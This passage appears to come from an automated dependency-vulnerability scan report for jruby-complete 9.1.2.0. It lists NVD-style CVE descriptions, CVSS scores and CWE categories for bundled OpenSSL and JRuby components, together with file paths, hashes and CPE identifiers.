CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.

Vulnerable Software & Versions: (show all)

CVE-2014-3572  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.

Vulnerable Software & Versions: (show all)

CVE-2014-3571  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3570  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3568  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j does not properly enforce the no-ssl3 build option, which allows remote attackers to bypass intended access restrictions via an SSL 3.0 handshake, related to s23_clnt.c and s23_srvr.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3567  

Severity: High
CVSS Score: 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.

Vulnerable Software & Versions: (show all)

CVE-2014-3566  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

Vulnerable Software & Versions: (show all)

CVE-2014-3470  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.

Vulnerable Software & Versions: (show all)

CVE-2014-0224  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.

Vulnerable Software & Versions: (show all)

CVE-2014-0221  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.

Vulnerable Software & Versions: (show all)

CVE-2014-0195  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.

Vulnerable Software & Versions: (show all)

CVE-2014-0076  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack.

Vulnerable Software & Versions: (show all)

CVE-2013-6449  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.

Vulnerable Software & Versions: (show all)

CVE-2013-0169  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

Vulnerable Software & Versions: (show all)

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2012-2333  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-189 Numeric Errors

Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.

Vulnerable Software & Versions: (show all)

CVE-2012-2110  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.

Vulnerable Software & Versions: (show all)

CVE-2012-1165  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.

Vulnerable Software & Versions: (show all)

CVE-2012-0884  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.

Vulnerable Software & Versions: (show all)

CVE-2012-0027  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client.

Vulnerable Software & Versions: (show all)

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions: (show all)

CVE-2011-4619  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2011-4577  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.

Vulnerable Software & Versions: (show all)

CVE-2011-4576  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.

Vulnerable Software & Versions: (show all)

CVE-2011-4354  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

crypto/bn/bn_nist.c in OpenSSL before 0.9.8h on 32-bit platforms, as used in stunnel and other products, in certain circumstances involving ECDH or ECDHE cipher suites, uses an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves, which allows remote attackers to obtain the private key of a TLS server via multiple handshake attempts.

Vulnerable Software & Versions: (show all)

CVE-2011-4108  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.

Vulnerable Software & Versions: (show all)

CVE-2011-1945  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The elliptic curve cryptography (ECC) subsystem in OpenSSL 1.0.0d and earlier, when the Elliptic Curve Digital Signature Algorithm (ECDSA) is used for the ECDHE_ECDSA cipher suite, does not properly implement curves over binary fields, which makes it easier for context-dependent attackers to determine private keys via a timing attack and a lattice calculation.

Vulnerable Software & Versions: (show all)

CVE-2011-1473  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment.

Vulnerable Software & Versions: (show all)

CVE-2010-5298  

Severity: Medium
CVSS Score: 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.

Vulnerable Software & Versions: (show all)

CVE-2010-4252  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

OpenSSL before 1.0.0c, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol.

Vulnerable Software & Versions: (show all)

CVE-2010-4180  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier.

Vulnerable Software & Versions: (show all)

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions: (show all)

CVE-2010-0742  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2010-0433  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.

Vulnerable Software & Versions: (show all)

CVE-2009-4355  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.

Vulnerable Software & Versions: (show all)

CVE-2009-3555  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

Vulnerable Software & Versions: (show all)

CVE-2009-3245  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

OpenSSL before 0.9.8m does not check for a NULL return value from bn_wexpand function calls in (1) crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3) crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which has unspecified impact and context-dependent attack vectors.

Vulnerable Software & Versions: (show all)

CVE-2009-1387  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug."

Vulnerable Software & Versions: (show all)

CVE-2009-1378  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka "DTLS fragment handling memory leak."

Vulnerable Software & Versions: (show all)

CVE-2009-1377  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of "future epoch" DTLS records that are buffered in a queue, aka "DTLS record buffer limitation bug."

Vulnerable Software & Versions: (show all)

CVE-2009-0789  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

OpenSSL before 0.9.8k on WIN64 and certain other platforms does not properly handle a malformed ASN.1 structure, which allows remote attackers to cause a denial of service (invalid memory access and application crash) by placing this structure in the public key of a certificate, as demonstrated by an RSA public key.

Vulnerable Software & Versions: (show all)

CVE-2009-0590  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.

Vulnerable Software & Versions: (show all)

CVE-2008-7270  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.

Vulnerable Software & Versions: (show all)

CVE-2008-5077  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-20 Improper Input Validation

OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys.

Vulnerable Software & Versions: (show all)

CVE-2007-5536  

Severity: Medium
CVSS Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Unspecified vulnerability in OpenSSL before A.00.09.07l on HP-UX B.11.11, B.11.23, and B.11.31 allows local users to cause a denial of service via unspecified vectors.

Vulnerable Software & Versions:

CVE-2007-3108  

Severity: Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:P/I:N/A:N)

The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys.

Vulnerable Software & Versions:

CVE-2006-7250  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message.

Vulnerable Software & Versions: (show all)

CVE-2006-4343  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

Vulnerable Software & Versions: (show all)

CVE-1999-0428  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls.

Vulnerable Software & Versions: (show all)

jruby-complete-9.1.2.0.jar: json-1.8.3-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/json-1.8.3-java.gemspec
MD5: 5eaf31c5d0da0413ad7f4005be3b4a18
SHA1: 24c9ba6aa50489aeb4ff2b16dc4b6920f0f84aeb

Identifiers

  • cpe: cpe:/a:jruby:jruby:1.8.3   Confidence:LOW   

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: minitest-5.4.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/minitest-5.4.1.gemspec
MD5: cad713d13ea10dca1d3d301ae89095b6
SHA1: 77e07c04707da19fea9367e20c98ad4b0213940b

Identifiers

  • None

jruby-complete-9.1.2.0.jar: net-telnet-0.1.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/net-telnet-0.1.1.gemspec
MD5: 2dbf210f06ee958d06e7ad1c7dab6874
SHA1: 94fc59346cc5b058176b94037b877ad3b5d254b4

Identifiers

  • None

jruby-complete-9.1.2.0.jar: power_assert-0.2.3.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/power_assert-0.2.3.gemspec
MD5: b9c7fd8616868906ed899dfc029bde5f
SHA1: 739561c3ce5a183b8bca344cbb07b5e2280db198

Identifiers

  • None

jruby-complete-9.1.2.0.jar: psych-2.0.17-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/psych-2.0.17-java.gemspec
MD5: f9d0bafe90a629f61c13b896b83d4b89
SHA1: 9015c344519591012da277050d208cdbacf7f210

Identifiers

  • None

jruby-complete-9.1.2.0.jar: racc-1.4.13-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/racc-1.4.13-java.gemspec
MD5: 73a6e8098118cdbcf985bfe577a793cc
SHA1: 3686e655c90c083a9c8c8a40bfa66d346048afbb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: rake-10.4.2.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/rake-10.4.2.gemspec
MD5: b65000317e704ddebc33513f09d00c7b
SHA1: 0adcc512220c493a50fdd13e48b49d09f6331f16

Identifiers

  • None

jruby-complete-9.1.2.0.jar: rdoc-4.2.0.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/rdoc-4.2.0.gemspec
MD5: e7cfbce03b095e6c28d50fe5400b3ed6
SHA1: 8070e3c86e978a6ad7383b9ac6f1c534662d9160

Identifiers

  • cpe: cpe:/a:dave_thomas:rdoc:4.2.0   Confidence:LOW   

jruby-complete-9.1.2.0.jar: test-unit-3.1.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/test-unit-3.1.1.gemspec
MD5: af9719b6b8922c3dbdd115b3bdf133ff
SHA1: 2e060d376279be4bca0616b85a37e5ede51585b1

Identifiers

  • None

jruby-complete-9.1.2.0.jar: Rakefile

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/ffi/tools/Rakefile
MD5: 0f5f4d1794d04c02252221ba8a1465a5
SHA1: c37abced3b762a0d4c39043b897ca4043bd227ad

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jline-2.11.jar

Description: Sonatype helps open source projects to set up Maven repositories on https://oss.sonatype.org/

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar
MD5: aa66f14587f87eb6fc19aa728925dd64
SHA1: 9504d5e2da5d78237239c5226e8200ec21182040

Identifiers

jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar/META-INF/native/windows32/jansi.dll
MD5: 1e56641bb68937f8e2020cbff5d04a08
SHA1: 97f6e12599bb5848867b9762184d055ed918ab2a

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar/META-INF/native/windows64/jansi.dll
MD5: fd3a20891286c958103f3ea07174cd3c
SHA1: 829195c9e338d5725cf304ae33fc209db53884eb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: joda-time-2.3.jar

Description: Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/joda-time/joda-time/2.3/joda-time-2.3.jar
MD5: ff85fe8f3ab26b36092475a95f43fb7e
SHA1: 56498efd17752898cfcc3868c1b6211a07b12b8f

Identifiers

jruby-complete-9.1.2.0.jar: jopenssl.jar

Description: JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby OpenSSL native library.

License:

EPL-1.0: http://opensource.org/licenses/EPL-1.0
GPL-2.0: http://opensource.org/licenses/GPL-2.0
LGPL-2.1: http://opensource.org/licenses/LGPL-2.1
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jopenssl.jar
MD5: 596d80b14850ac04414440044fec737a
SHA1: 44f8593131edf0d6cdd2c3bbd0fd317e611ab5f1

Identifiers

  • cpe: cpe:/a:jruby:jruby:0.9.15   Confidence:LOW   
  • cpe: cpe:/a:openssl:openssl:0.9.15   Confidence:LOW   
  • maven: rubygems:jruby-openssl:0.9.15   Confidence:HIGH

CVE-2016-2176  

Severity: Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data.

Vulnerable Software & Versions: (show all)

CVE-2016-2109  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.

Vulnerable Software & Versions: (show all)

